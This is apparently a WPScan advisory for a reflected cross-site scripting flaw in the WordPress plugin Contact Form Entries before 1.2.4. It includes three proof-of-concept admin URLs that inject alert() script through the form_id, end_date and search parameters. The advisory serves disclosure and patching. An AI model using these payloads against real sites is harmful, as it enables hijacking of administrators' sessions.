WordPress Plugin Vulnerabilities
Contact Form Entries < 1.2.4 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page
Proof of Concept
https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F+ne97l&status&tab=entries&search&order=desc&orderby=fir+ https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=&order=asc&orderby=file-438&field=&time=&start_date=&end_date=onobw%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez2u4g https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=e67x3%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22oakfc&order=asc&orderby=file-438&field=&time=&start_date=&end_date=
Affects Plugins
Fixed in 1.2.4 References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Gaetano Perrone
Submitter
Gaetano Perrone
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-14 (about 2 years ago)
Added
2021-12-24 (about 2 years ago)
Last Updated
2022-04-10 (about 2 years ago)
WPScan 